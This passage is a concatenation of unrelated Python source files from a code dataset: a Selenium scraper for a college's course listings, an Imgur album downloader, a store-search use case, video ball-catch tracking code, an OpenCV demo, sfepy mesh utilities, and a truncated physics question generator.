course list for each department for a given term\n\ndef updateDepartments(term,depts=getDept.gatherFields().dept,skips=False):\n\tif term not in getDept.gatherFields().terms:\n\t\tprint(\"Invalid Term\")\n\t\texit(1)\n\tfails = []\n\tgood = []\n\tif skips:\n\t\t#print(\"Adding courses to good\")\n\t\tskipCourses = open(skips)\n\t\tgood = skipCourses.read().split('|')\n\t\tskipCourses.close()\n\t#print (\"Initializing browser...\")\n\t# browser = webdriver.Chrome() # use ChromeDriver\n\tbrowser = webdriver.PhantomJS('phantomjs') # use PhantomJS - GhostDriver\n\tbrowser.implicitly_wait(10)\n\tdeptCount = 0\n\tdeptLen = len(depts)\n\tprint (\"Number of departments:\",deptLen)\n\tprogress.printProgressBar(deptCount, deptLen, prefix = 'Progress:', suffix = 'Complete', length = 40)\n\tfor dept in depts:\n\t\tdeptCount += 1\n\t\tprogress.printProgressBar(deptCount, deptLen, prefix = 'Progress:', suffix = 'Complete', length = 40)\n\t\t#print (\"Working on dept:\",dept+'|')\n\t\tif dept == '':\n\t\t\tcontinue\n\t\telif dept in good:\n\t\t\t#print(\"Skipping\",dept)\n\t\t\tcontinue\n\t\ttries = 0\n\t\tsuccess = False\n\t\twhile not success and tries < 2:\n\t\t\tsuccess = gatherDept(term,dept,browser)\n\t\t\ttries += 1\n\t\t\t#print(\"Try\",tries)\n\t\tif success:\n\t\t\tgood.append(dept)\n\t\telif tries == 2:\n\t\t\tfails.append(dept)\n\t\t\t#print(\"Failed to get dept\",dept+'|')\n\t\t\tcontinue\n\tfor dept in fails:\n\t\tsuccess = gatherDept(term,dept,browser)\n\t\tif success:\n\t\t\tgood.append(dept)\n\t\t\tfails.remove(dept)\n\twriteToFile(fails,'courselists/'+term+'/','fails.txt')\n\twriteToFile(good,'courselists/'+term+'/','good.txt')\n\twhile len(browser.window_handles) > 1:\n\t\tbrowser.switch_to_window(browser.window_handles[0])\n\t\tbrowser.close()\n\tprint (fails)\n\t\n# gatherDept(term, dept)\n# term = YYYYTT i.e. 
2017SU - string\n# dept = department code - string\n# returns boolean - true for success\n# navegates to the page of all courses for a specified dept and term\ndef gatherDept(term,dept,browser):\n\ttry:\n\t\tnavegateSearch(browser)\n\texcept:\n\t\treturn False\n\ttry:\n\t\t##print(\"Selecting\",term)\n\t\tSelect(browser.find_element_by_id('VAR1')).select_by_value(term)\n\t\t##print(\"Selecting\",'|'+dept+'|')\n\t\tSelect(browser.find_element_by_id('LIST_VAR1_1')).select_by_value(dept)\n\t\t##print(\"Clicking submit\")\n\t\tbrowser.find_element_by_name('SUBMIT2').click()\n\texcept:\n\t\treturn False\n\treturn getCourseHTML(term,dept,browser)\n\t\n\t\n\t\n# def navegateSearch(browser)\n# browser = selenium.webdriver.phantomjs.webdriver.WebDriver session\n# opens up to the Search for Sections page on webAdvisor\ndef navegateSearch(browser):\n\t##print(\"Opening webadvisor...\")\n\tbrowser.get('https://webadvisor.ohlone.edu')\n\t##print(\"Navegating to Students...\")\n\tbrowser.find_element_by_link_text(\"Students\").click()\n\t##print(\"Navegating to Search for Sections...\")\n\tbrowser.find_element_by_link_text(\"Search for Sections\").click()\n\t\n# getCourseHTML(browser)\n# term = YYYYTT i.e. 2017SU - string\n# dept = department code - string\n# browser = selenium.webdriver.phantomjs.webdriver.WebDriver session\n# saves html for each course in that dept to a file called courselists/[TERM][DEPT].txt\ndef getCourseHTML(term,dept,browser):\n\tsoup_html = BeautifulSoup(browser.page_source,'html.parser')\n\ttry:\n\t\tend = int(re.findall(r'Page [\\w?]+ of [\\w?]+',str(soup_html))[0].split(' ')[-1])\n\texcept:\n\t\treturn False\n\tif not os.path.exists(os.path.dirname('courselists/'+term+'/')):\n\t try:\n\t os.makedirs(os.path.dirname('courselists/'+term+'/'))\n\t except:\n\t \treturn False\n\tf = open('courselists/'+term+'/'+dept+'.txt','w')\n\tf.write(dept+ \" courses for \"+term+' updated: '+str(date.today())+'\\n----------------------------------\\n\\n-------\\n')\n\thome = browser.window_handles[0]\n\tcount = 0\n\tfor page in range(end):\n\t\t#print(\"Working on page \"+str(page+1))\n\t\tfor i in range(20):\n\t\t\t#print(\"Working on course \"+str(i+1))\n\t\t\tcourseTry = 0\n\t\t\tstatus = False\n\t\t\tlastPage = False\n\t\t\twhile not status and courseTry < 3:\n\t\t\t\ttry:\n\t\t\t\t\tbrowser.find_element_by_id('SEC_SHORT_TITLE_'+str(i+1)).click()\n\t\t\t\texcept:\n\t\t\t\t\tif page+1 != end:\n\t\t\t\t\t\treturn False\n\t\t\t\t\telse:\n\t\t\t\t\t\tstatus = True\n\t\t\t\t\t\tlastPage = True\n\t\t\t\t\t\tbreak\n\t\t\t\tstatus = getPage(browser,f)\n\t\t\t\tcourseTry += 1\n\t\t\t\t#if not status:\n\t\t\t\t\t#print (\"Failed to gather course... 
Try \",courseTry)\n\t\t\t\tbrowser.switch_to_window(home)\n\t\t\tif not status:\n\t\t\t\t#print (\"Failed to get course section...\")\n\t\t\t\treturn False\n\t\t\telif lastPage:\n\t\t\t\tbreak\n\t\t\tcount += 1\n\t\ttry:\n\t\t\tbrowser.find_element_by_xpath('//*[@id=\"GROUP_Grp_WSS_COURSE_SECTIONS\"]/table[1]/tbody/tr/td[1]/input[3]').click()\n\t\texcept:\n\t\t\treturn False\n\t#print (dept,\"Department: \",count,\"course(s).\")\n\tf.close()\n\treturn True\n\n# getPage(browser,file)\n# browser = selenium.webdriver.phantomjs.webdriver.WebDriver session\n# file = io opened file for writing\n# writes the html to a file\ndef getPage(browser,file):\n\tbrowser.switch_to_window(browser.window_handles[-1])\n\tpage = browser.page_source\n\tsoup = BeautifulSoup(page,'html.parser')\n\ttry:\n\t\ttest = soup.find(id=\"VAR1\").get_text()\n\t\tif test == '' or test == '\\n':\n\t\t\t#print('No text in fields... (Error Code: 1)')\n\t\t\tbrowser.close()\n\t\t\treturn False\n\texcept:\n\t\t#print('Failed to load correct page... (Error Code: 2)')\n\t\tbrowser.close()\n\t\treturn False\n\t##print(\"Course recorded.\")\n\tfile.write(page)\n\tfile.write('\\n-------\\n')\n\tbrowser.close()\n\treturn True\n\t\n\t\n# writeToFile(l,directory,file)\n# l = list of department codes\n# directory = $PATH_TO_TERM_DIRECTORY - string\n# file = filename - string\n# saves the list, delimited by a '|' to the given file in the given directory\ndef writeToFile(l,directory,file):\n\tif not os.path.exists(os.path.dirname(directory)):\n\t try:\n\t os.makedirs(os.path.dirname(directory))\n\t except:\n\t \treturn False\n\tf = open(directory+file,'w')\n\tfor dept in l:\n\t\tf.write(dept+'|')\n\tf.close()","sub_path":"parsing/pullCourses.py","file_name":"pullCourses.py","file_ext":"py","file_size_in_byte":6344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"217384640","text":"import re\nimport os\n\nfrom libs import *\n\n\nclass ImgurAlbumException(Exception):\n\n def __init__(self, msg=False):\n self.msg = msg\n\n\ndef is_album(url):\n \"\"\"\n Checks if the given URL is actually from a imgur album\n \"\"\"\n match = re.match(ALBUM_URL, url)\n return match\n\n\nclass ImgurAlbum:\n\n def __init__(self, album_url, folder_name):\n \"\"\"\n Constructor. 
Pass in the URL to the album to download\n \"\"\"\n self.album_url = album_url\n self.folder_name = folder_name\n\n # Callbacks for album download progress\n self.image_start_callbacks = []\n self.image_progress_callbacks = []\n self.image_complete_callbacks = []\n self.album_start_callbacks = []\n self.album_complete_callbacks = []\n\n # Check the URL is a valid imgur album\n match = is_album(album_url)\n if not match:\n raise ImgurAlbumException(\"URL must be a valid Imgur Album\")\n\n # Retrieve album ID\n self.album_key = match.group(4)\n\n\n def on_image_start(self, callback):\n \"\"\"\n Allows binding a function onto the start of the download process of each\n image in the album.\n Callback includes the image URL and the folder path.\n \"\"\"\n self.image_start_callbacks.append(callback)\n\n\n def on_image_progress(self, callback):\n \"\"\"\n Allows binding a function onto the download progress of the gif.\n Callback includes the url, save path, downloaded bytes and total size.\n \"\"\"\n self.image_progress_callbacks.append(callback)\n\n\n def on_image_complete(self, callback):\n \"\"\"\n Allows binding a function to the download complete event of each image in\n the album.\n The callback provides the image URL, save location, a flag to show if the\n image has already been downloaded, the image index and the total number of\n images\n \"\"\"\n self.image_complete_callbacks.append(callback)\n\n\n def on_album_start(self, callback):\n \"\"\"\n Allows binding a function to the start of the album download process.\n The callback includes the album URL and the directory where the album\n is saved.\n \"\"\"\n self.album_start_callbacks.append(callback)\n\n\n def on_album_complete(self, callback):\n \"\"\"\n Allows binding a function to the end of the album download process.\n The callback includes the album URL and the directory where the images\n are saved.\n \"\"\"\n self.album_complete_callbacks.append(callback)\n\n\n def save_images(self, parent_folder):\n \"\"\"\n Saves the images from the album into a folder given by foldername.\n Each album will be stored in a unique sub-directory identified by the album ID\n If the folder doesn't exist, it'll try and create it.\n \"\"\"\n # Run the album_start callbacks:\n for fn in self.album_start_callbacks:\n fn(self.album_url, parent_folder)\n\n # Read the blog version of the page to retrieve all images\n fullListURL = \"http://imgur.com/a/\" + self.album_key + \"/layout/blog\"\n\n # Download HTML data\n self.response = make_request(fullListURL)\n if not self.response:\n return\n\n # Read in the images now so we can get stats and stuff:\n html = self.response.read().decode('utf-8')\n self.image_links = re.findall(ALBUM_SCRAPPER_REGEX, html)\n if len(self.image_links) == 0:\n print_warning(\"No images found in current album\")\n return\n\n # Try and create the album folder:\n album_folder = os.path.join(parent_folder, self.folder_name)\n if not os.path.exists(album_folder):\n os.makedirs(album_folder)\n\n # Loop through and save the images\n for (counter, image) in enumerate(self.image_links, start = 1):\n # Imgur seems to always accept image requests with '.jpg'\n image_url = IMGUR_URL + image + \".jpg\"\n # Download the image\n self.handle_image(image_url, album_folder, counter, len(self.image_links))\n\n # Run the album_complete callbacks:\n for fn in self.album_complete_callbacks:\n fn(self.album_url, album_folder, len(self.image_links))\n\n\n def handle_image(self, image_url, directory, index, total_images):\n \"\"\"\n Download a single 
image from the provided url and save it in the provided directory\n \"\"\"\n # Prepare the index of each image, padded with '0'\n image_num = len(str(total_images))\n cnt_str = str(index).zfill(image_num)\n # Set the file name for each image\n file_name = \"%s\" % cnt_str\n\n image = Image(image_url, file_name)\n for callback in self.image_start_callbacks:\n image.on_image_start(callback)\n for callback in self.image_progress_callbacks:\n image.on_image_progress(callback)\n for callback in self.image_complete_callbacks:\n image.on_image_complete(callback)\n\n\n image.image_index = index\n image.image_total = total_images\n image.save_image(directory)\n","sub_path":"libs/imgur_album.py","file_name":"imgur_album.py","file_ext":"py","file_size_in_byte":5171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"538964832","text":"from typing import Dict, List, Type\n\nfrom src.data.interfaces import StoreRepositoryInterface as StoreRepository\nfrom src.domain.use_cases import FindStores as FindStoresInterface\nfrom src.domain.models import Store\n\n\nclass FindStores(FindStoresInterface):\n \"\"\" Class to define usecase: Find stores \"\"\"\n\n def __init__(self, store_repository: Type[StoreRepository]):\n self.store_repository = store_repository\n\n def search_by_name_or_typestore(self, name: str = None, typestore: str = None) -> Dict[bool, List[Store]]:\n response = None\n validate_entry = all([\n isinstance(name, str) or name is None,\n isinstance(typestore, str) or typestore is None,\n ])\n\n if validate_entry:\n response = self.store_repository.search_by_name_or_typestore(name=name, typestore=typestore)\n\n return {\"success\": validate_entry, \"data\": response}\n","sub_path":"src/data/find_store/find.py","file_name":"find.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"438956614","text":"import cv2\nimport numpy as np\nimport pandas as pd\nimport torch\nimport csv\nimport statistics\nfrom os import path\n\n#Constants\ncurrent_file_name = ''\ncurrent_file_data = None\n\n\n\n#Input Functions for Sample Solution\n\ndef load_labels(file_name, image_width, image_height, frame_number=-1):\n '''\n Author: \n Ziteng Jiao\n\n Parameter:\n file_name: path to the label file. 
groundtruths.txt\n image_width: the width of image (video frame)\n image_height: the height of image (video frame)\n frame_number: the specific frame number that we want\n if we want the whole label table then this should be -1\n the default value is -1\n Return:\n When frame_number is -1:\n type: pandas DataFrame \n content: all labels\n format: [\"Frame\", \"Class\",\"ID\",\"X\",\"Y\",\"Width\",\"Height\"]\n When frame_number is not -1:\n type: pytorch tensor\n content: coordinates of objects in the requested frame \n empty tensor if the requested frame doesn't exist in the label file\n format: [\"Class\",\"ID\",\"X\",\"Y\",\"Width\",\"Height\"]\n '''\n # data = pd.read_csv(file_name, sep=' ')\n global current_file_name\n global current_file_data\n if not path.exists(file_name):\n print(\"The file\", file_name, \"doesn't exist.\")\n exit(1)\n if file_name != current_file_name:\n current_file_name = file_name\n current_file_data = pd.read_csv(current_file_name, sep=',')\n current_file_data['X'] = current_file_data['X'].apply(lambda x: x*image_width)\n current_file_data['Y'] = current_file_data['Y'].apply(lambda x: x*image_height)\n current_file_data['Width'] = current_file_data['Width'].apply(lambda x: x*image_width)\n current_file_data['Height'] = current_file_data['Height'].apply(lambda x: x*image_height)\n\n if frame_number==-1:\n return current_file_data\n frame = current_file_data[(current_file_data[\"Frame\"]==frame_number)]\n pt_frame = torch.tensor(frame[[\"Class\",\"ID\",\"X\",\"Y\",\"Width\",\"Height\"]].values)\n return pt_frame\n\n\n\n\n\n#Output Functions for Sample Solution\ndef detect_catches(image, bbox_xyxy, classes, ids, frame_num, colorDict, frame_catch_pairs, ball_person_pairs, colorOrder):\n #Create a list of bbox centers and ranges\n bbox_XYranges = bbox_xyxy2XYranges(bbox_xyxy)\n \n\n #Detect the color of each ball and return a dictionary matching id to color\n detected_ball_colors = detect_colors(image, bbox_XYranges, classes, ids, colorDict)\n\n #Detect collisions between balls and people\n collisions = detect_collisions(classes, ids, frame_num, bbox_XYranges, detected_ball_colors)\n\n #Update dictionary pairs\n frame_catch_pairs, ball_person_pairs = update_dict_pairs(frame_num, collisions, frame_catch_pairs, ball_person_pairs, colorOrder)\n bbox_strings = format_bbox_strings(ids, classes, detected_ball_colors, collisions)\n\n return (bbox_strings, frame_catch_pairs, ball_person_pairs)\n\n\ndef detect_colors(image, bbox_XYranges, classes, ids, colorDict):\n detected_ball_colors = {}\n bbox_offset = 5\n\n for i in range(len(classes)):\n\n #Checks if the class is a ball (1)\n if (classes[i] == 1): \n #Extract region of interest HSV values\n #Image values are (height, width, colorchannels)\n X = bbox_XYranges[i][0]\n Y = bbox_XYranges[i][1]\n roi_bgr = image[(Y - bbox_offset):(Y + bbox_offset), (X - bbox_offset):(X + bbox_offset)]\n\n\n #Convert BGR image to HSV image\n roi_hsv = cv2.cvtColor(roi_bgr, cv2.COLOR_BGR2HSV)\n hue = np.mean(roi_hsv[:,:,0])\n sat = np.mean(roi_hsv[:,:,1])\n val = np.mean(roi_hsv[:,:,2])\n ball_color = (hue, sat, val)\n\n\n #Check if the color is in a specified range\n for color in colorDict:\n upper = colorDict[color][0]\n lower = colorDict[color][1]\n\n if (ball_color <= upper) :\n if (ball_color >= lower) :\n detected_ball_colors[ids[i]] = [color, bbox_XYranges[i][0], bbox_XYranges[i][1]]\n break\n\n return detected_ball_colors\n\n\n
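#Note (added for clarity): colorDict maps each color name to an (upper, lower)\n#pair of HSV tuples, and the range checks in detect_colors rely on Python's\n#lexicographic tuple comparison. Illustrative entry (values are hypothetical):\n#\n# colorDict = {'green': ((85, 255, 255), (45, 100, 100))}\n\n\n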
def bbox_xyxy2XYranges(bbox_xyxy):\n bbox_XYranges = []\n\n #Create list of bbox centers and ranges\n for box in bbox_xyxy:\n #Get bbox corners\n xmin = int(box[0])\n ymin = int(box[1])\n xmax = int(box[2])\n ymax = int(box[3])\n\n #Get center of bounding box\n X = int(((xmax - xmin) / 2) + xmin)\n Y = int(((ymax - ymin) / 2) + ymin)\n\n #Create a range for collision detection\n X_range = (X - ((xmax - xmin) / 2), X + ((xmax - xmin) / 2))\n Y_range = (Y - ((ymax - ymin) / 2), Y + ((ymax - ymin) / 2))\n\n bbox_XYranges.append([X, Y, X_range, Y_range])\n\n return bbox_XYranges\n\n\ndef format_bbox_strings(ids, classes, detected_ball_colors, collisions):\n bbox_strings = [None] * len(classes)\n\n for i in range(len(classes)):\n #Person bbox info\n if (ids[i] in collisions):\n color = collisions[ids[i]]\n txt = 'Holding {color}'.format(color = color)\n\n #Ball bbox info \n elif (ids[i] in detected_ball_colors):\n color = detected_ball_colors[ids[i]][0]\n txt = 'Detected {color}'.format(color = color)\n\n else:\n txt = ''\n\n bbox_strings[i] = txt\n\n return bbox_strings\n\n\ndef detect_collisions(classes, ids, frame_num, bbox_XYranges, detected_ball_colors):\n #collisions = {'id' : color, ....}\n collisions = {}\n #IDs greater than maxId are likely not tracked correctly\n maxId = 8\n\n for i in range(len(classes)):\n #Check if a person\n if ((classes[i] == 0) and (ids[i] < maxId)):\n\n #Get person's bbox range\n person_X_range = bbox_XYranges[i][2]\n person_Y_range = bbox_XYranges[i][3]\n\n #Check if the center of a ball is in a person's bounding box\n #detected_ball_colors = {'id' : [color, X, Y], ...}\n for ball in detected_ball_colors:\n ball_color = detected_ball_colors[ball][0]\n ball_X = detected_ball_colors[ball][1]\n ball_Y = detected_ball_colors[ball][2]\n\n if (ball_X >= person_X_range[0] and ball_X <= person_X_range[1] and ball_Y >= person_Y_range[0] and ball_Y <= person_Y_range[1] and (ball_color not in collisions.values())):\n collisions[ids[i]] = ball_color\n break\n\n return collisions\n\n\ndef update_dict_pairs(frame_num, collisions, frame_catch_pairs, ball_person_pairs, colorOrder):\n updateFrames = 0\n\n for person in collisions:\n color = collisions[person]\n tmp = {}\n #Ball color has not been held yet\n if (color not in ball_person_pairs):\n ball_person_pairs[color] = person\n\n #Ball is held by a new person \n elif (ball_person_pairs[color] != person):\n ball_person_pairs[color] = person\n updateFrames = 1\n\n if (updateFrames):\n tmp = ''\n for color in colorOrder:\n tmp = tmp + str(ball_person_pairs[color]) + ' '\n frame_catch_pairs.append([frame_num, tmp])\n\n return (frame_catch_pairs, ball_person_pairs)\n\n\ndef write_catches(output_path, frame_catch_pairs, colorOrder):\n colorOrder.insert(0, \"frame\")\n with open(output_path, 'w', newline='') as csvfile:\n writer = csv.writer(csvfile, delimiter=',', quotechar=' ', quoting=csv.QUOTE_MINIMAL)\n writer.writerow(colorOrder)\n frame_catch_pairs = smooth_frame_pairs(frame_catch_pairs)\n for i in range(len(frame_catch_pairs)):\n frame = frame_catch_pairs[i][0]\n pairs = frame_catch_pairs[i][1].split(' ')\n pairs.insert(0, frame)\n writer.writerow(pairs)\n\n return\n \n \ndef smooth_frame_pairs(frame_catch_pairs):\n max_diff = 5 \n size = len(frame_catch_pairs)\n smooth_pairs = []\n\n i = 0\n while i < size:\n frame = frame_catch_pairs[i][0]\n\n #Check if next item is in range\n if((i+1) < size):\n diff = frame_catch_pairs[i+1][0] - frame\n\n #Check if next frame is close\n if(diff < max_diff):\n color_ids = [[],[],[],[],[],[]]\n tmp_frames = frame_catch_pairs[i:]\n nxt_i = i\n\n for cur_frame in tmp_frames:\n cur_ids = 
cur_frame[1][:-1]\n cur_ids = cur_ids.split(' ')\n cur_dif = cur_frame[0] - frame\n\n if(cur_dif < max_diff):\n for k in range(len(cur_ids)):\n color_ids[k].append(cur_ids[k])\n nxt_i = nxt_i + 1\n else:\n break\n \n tmp = ''\n for j in range(len(color_ids)):\n mode = statistics.mode(color_ids[j])\n tmp = tmp + mode + ' '\n \n i = nxt_i\n smooth_pairs.append([frame,tmp]) \n else:\n smooth_pairs.append(frame_catch_pairs[i])\n i = i + 1\n\n else:\n smooth_pairs.append(frame_catch_pairs[i])\n i = i + 1\n\n return smooth_pairs\n\n\n\n\n\n\n\n","sub_path":"solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":9461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"98027707","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimg = cv2.imread('j.png',0)\nkernel = np.ones((5,5),np.uint8)\nprint(kernel)\nopening = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel)\n\nplt.subplot(121), plt.imshow(img), plt.title('Original')\nplt.xticks([]), plt.yticks([])\nplt.subplot(122), plt.imshow(opening), plt.title('Opening')\nplt.xticks([]), plt.yticks([])\nplt.show()","sub_path":"ImageProcesscing/MorphologicalTransformation/Openning.py","file_name":"Openning.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"558812911","text":"# -*- coding: utf-8 -*-\n\nfrom ..settings.settings import NUMBER_OF_SPIDERS\nfrom .all_pipelines import ALL_PIPELINES\n\nclass TransformData(object):\n def process_item(self, item, spider):\n for counter in range(1, NUMBER_OF_SPIDERS + 1):\n if type(spider).__name__ == f'Spider{counter}':\n ALL_PIPELINES[f'spider{counter}'](item)\n return item\n","sub_path":"main/data_pipelines/TransformData.py","file_name":"TransformData.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"250644883","text":"import numpy as nm\n\nimport sfepy.linalg as la\nfrom extmods.mappings import CSurfaceMapping\n\ndef prepare_remap(indices, n_full):\n \"\"\"\n Prepare vector for remapping range `[0, n_full]` to its subset given\n by `indices`.\n \"\"\"\n remap = nm.empty((n_full,), dtype=nm.int32)\n remap.fill(-1)\n remap[indices] = nm.arange(indices.shape[0], dtype=nm.int32)\n\n return remap\n\ndef invert_remap(remap):\n \"\"\"\n Return the inverse of `remap`, i.e. a mapping from a sub-range\n indices to a full range, see :func:`prepare_remap()`.\n \"\"\"\n if remap is not None:\n inverse = nm.where(remap >= 0)[0].astype(nm.int32)\n\n else:\n inverse = None\n\n return inverse\n\ndef compute_nodal_normals(nodes, region, field, return_imap=False):\n \"\"\"Nodal normals are computed by simple averaging of element normals of\n elements every node is contained in. 
\"\"\"\n dim = field.shape[0]\n\n region.select_cells_of_surface()\n\n normals = nm.zeros( (nodes.shape[0], dim),\n dtype = nm.float64 )\n mask = nm.zeros( (nodes.max()+1,), dtype = nm.int32 )\n imap = nm.empty_like( mask )\n imap.fill( nodes.shape[0] ) # out-of-range index for normals.\n imap[nodes] = nm.arange( nodes.shape[0], dtype = nm.int32 )\n \n for ig, fis in region.fis.iteritems():\n ap = field.aps[ig]\n n_fa = fis.shape[0]\n n_fp = ap.efaces.shape[1]\n face_type = 's%d' % n_fp\n\n faces = ap.efaces[fis[:,1]]\n ee = ap.econn[fis[:,0]]\n econn = nm.empty( faces.shape, dtype = nm.int32 )\n for ir, face in enumerate( faces ):\n econn[ir] = ee[ir,face]\n mask[econn] += 1\n # Unit normals -> weights = ones.\n ps = ap.interp.poly_spaces[face_type]\n weights = nm.ones((n_fp,), dtype=nm.float64)\n\n coors = ps.node_coors\n bf_sg = ps.eval_base(coors, diff=True)\n\n cmap = CSurfaceMapping(n_fa, n_fp, dim, n_fp)\n cmap.describe(field.get_coor(), econn, bf_sg, weights)\n\n e_normals = cmap.normal.squeeze()\n\n # normals[imap[econn]] += e_normals\n im = imap[econn]\n for ii, en in enumerate( e_normals ):\n normals[im[ii]] += en\n\n # All nodes must have a normal.\n if not nm.all( mask[nodes] > 0 ):\n raise ValueError( 'region %s does not have complete faces!' % region.name )\n\n normals /= la.norm_l2_along_axis( normals )[:,nm.newaxis]\n\n if return_imap:\n return normals, imap\n\n else:\n return normals\n\ndef extend_cell_data( data, domain, rname, val = None ):\n \"\"\"Extend cell data defined in a region rname to the whole domain using the\n value val, or the smallest value in data if val is None.\"\"\"\n n_el = domain.shape.n_el\n if data.shape[0] == n_el: return data\n\n if val is None:\n if data.shape[2] > 1: # Vector.\n val = nm.amin( nm.abs( data ) )\n else: # Scalar.\n val = nm.amin( data )\n\n edata = nm.empty( (n_el,) + data.shape[1:], dtype = nm.float64 )\n edata.fill( val )\n\n region = domain.regions[rname]\n offs = region.get_cell_offsets()\n eoffs = domain.get_cell_offsets()\n## print offs\n## print eoffs\n## print domain.mat_ids_to_i_gs\n## pause()\n\n for group in domain.iter_groups():\n ig = group.ig\n ii = eoffs[ig]\n if ig in region.igs:\n n_cell = region.shape[ig].n_cell\n ir = offs[ig]\n edata[ii+region.cells[ig]] = data[ir:ir+n_cell]\n return edata\n\n
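# Worked example for the remap helpers at the top of this module (illustrative):\n# prepare_remap(nm.array([2, 0]), 4) gives [1, -1, 0, -1]: full-range index 2\n# maps to sub-range index 0 and full-range index 0 maps to 1; invert_remap()\n# then recovers the sorted index array [0, 2].\n\n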
def refine_mesh(filename, level):\n \"\"\"\n Uniformly refine `level`-times a mesh given by `filename`.\n\n The refined mesh is saved to a file with name constructed from base\n name of `filename` and `level`-times appended `'_r'` suffix.\n\n Parameters\n ----------\n filename : str\n The mesh file name.\n level : int\n The refinement level.\n \"\"\"\n import os\n from sfepy.base.base import output\n from sfepy.fem import Mesh, Domain\n\n if level > 0:\n mesh = Mesh.from_file(filename)\n domain = Domain(mesh.name, mesh)\n for ii in range(level):\n output('refine %d...' % ii)\n domain = domain.refine()\n output('... %d nodes %d elements'\n % (domain.shape.n_nod, domain.shape.n_el))\n\n suffix = os.path.splitext(filename)[1]\n filename = domain.name + suffix\n\n domain.mesh.write(filename, io='auto')\n\n return filename\n\n","sub_path":"sfepy/fem/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"476958279","text":"from sympy import *\nimport random\nimport numpy as np\n\nfrom qagen.qagen import *\nfrom qagen import utils\nfrom qagen import unit_test_for_user as user_test\n\nclass QA_constraint(QAGen):\n\n def __init__(self):\n '''\n Initializer for your QA question.\n '''\n super().__init__()\n self.author = 'Max Augustine'\n self.description = 'Consider a cable that is l = 3000000 m long. The conductor in this cable consists of x = 10 copper wires, each of diameter d = 0.001 m, bundled together and surrounded by an insulating sheath. The resistivity of copper is p = 3.0 \\cdot 10^{-8} Ωm. Calculate the resistance of the conductor in terms of l, d, p, and x'\n\n # keywords about the question that could help to make this more searchable in the future\n self.keywords = ['Physics', 'Electricity and Magnetism', 'E&M', 'resistance']\n self.use_latex = True\n\n def seed_all(self,seed):\n '''\n Write the seeding functions of the libraries that you are using.\n It's important to seed all the libraries you are using because the\n framework will assume it can seed stuff for you. It needs this for\n the library to work.\n '''\n random.seed(seed)\n np.random.seed(seed)\n self.fake.random.seed(seed)\n\n\n def init_consistent_qa_variables(self):\n \"\"\"\n Defines and returns all the variables that need to be consistent\n between a question and an answer. Usually only names and variable/symbol\n names.\n Example: when generating MC questions the non consistent variables will\n be used to generate other options. 
However, the names, symbols, etc\n        should remain consistent otherwise some answers will be obviously fake.\n        Numerical values that have been fully evaluated are a good example of\n        how multiple choice answers can be generated.\n        Note: debug flag can be used to deterministically output a QA that has\n        simple numbers to check the correctness of your QA.\n        '''\n        if self.debug:\n            l_val, x_val, d_val, diameter_radius, p_val, diameter = 3000000, 10, .001, 1, 0.00000003, 'diameter'\n        else:\n            l_val = np.random.randint(1, 1000000)\n            x_val = np.random.randint(1,100)\n            d_val = np.random.randint(1, 5000)/100000\n            diameter_radius = np.random.randint(1,100)\n            p_val = np.random.randint(2000,5000)/100000000000\n            if diameter_radius > 50:\n                d_val = d_val/2\n                diameter = 'radius'\n            else:\n                diameter = 'diameter'\n\n\n        return l_val, x_val, d_val, diameter_radius, p_val, diameter\n\n    def Q(s, l_val, x_val, d_val, diameter_radius, p_val, diameter, l,x,d,p):\n        '''\n        Important Note: first variables are the not consistent variables followed\n        by the consistent ones. See sample QA example if you need to.\n        '''\n        seqg, perg, choiceg = s.seqg, s.perg, s.choiceg\n\n        Consider = choiceg('Consider', 'There is', 'Let there be', 'Consider for a moment', 'Consider the existence of')\n        length_eq = Eq(l, l_val)\n        long = choiceg('in length', 'long')\n        thats = choiceg('that is', '''that's''', 'which is')\n        whose = choiceg('whose length is', 'with a length of', 'traversing a distance of','that traverses a distance of')\n\n\n        a0 = seqg(Consider, 'a cable',thats,length_eq,'m long.')\n        a1 = seqg('{0} a cable {3} {1} m {2}.'.format(Consider, length_eq, long, thats))\n        a2 = seqg('A cable is {0} m {1}.'.format(length_eq, long))\n        a3 = seqg('{0} a cable {1} {2} m.'.format(Consider, whose, length_eq))\n        a4 = seqg('{0} a long cable {1} {2} m.'.format(Consider, whose, length_eq))\n        a5 = seqg('{0} a long cable {2} {1} m.'.format(Consider, length_eq, thats))\n        a6 = seqg('A long cable is {0} m.'.format(length_eq))\n        a_part = choiceg(a0, a1,a2,a3,a4,a5,a6)\n\n        x_eq = Eq(x, x_val)\n        d_eq = Eq(d, d_val)\n        conductor = choiceg('there is', 'there lies', 'consider there being', '''there's''','resides')\n\n        each = choiceg('each of','', 'and each has a', 'and each contains a','and each consists of a', 'each one having', 'each having','each containing','each consisting of','each of which having','each of which consisting of', 'each of which contains')\n\n        b0 = seqg('The conductor in this cable consists of',x_eq,'copper wires,',each,diameter,d_eq,'m, bundled together and surrounded by an insulating sheath.')\n        b1 = seqg('The conductor in this cable consists of {0} copper wires, {3} {1} {2} m, bundled together and surrounded by an insulating sheath.'.format(x_eq, diameter, d_eq, each))\n        b2 = seqg('In the cable {3} a conductor which consists of {0} copper wires, {4} {1} {2} m, bundled together and surrounded by an insulating sheath.'.format(x_eq, diameter, d_eq, conductor, each))\n        b3 = seqg('Built into the cable is a conductor which consists of {0} copper wires, {3} {1} {2} m, bundled together and surrounded by an insulating sheath.'.format(x_eq, diameter, d_eq, each))\n        b4 = seqg('The conductor in this cable consists of an insulating sheath that surrounds {0} copper wires, {3} {1} {2} m.'.format(x_eq, diameter, d_eq, each))\n        b5 = seqg('In the cable {3} a conductor which consists of an insulating sheath that surrounds {0} copper wires, {4} {1} 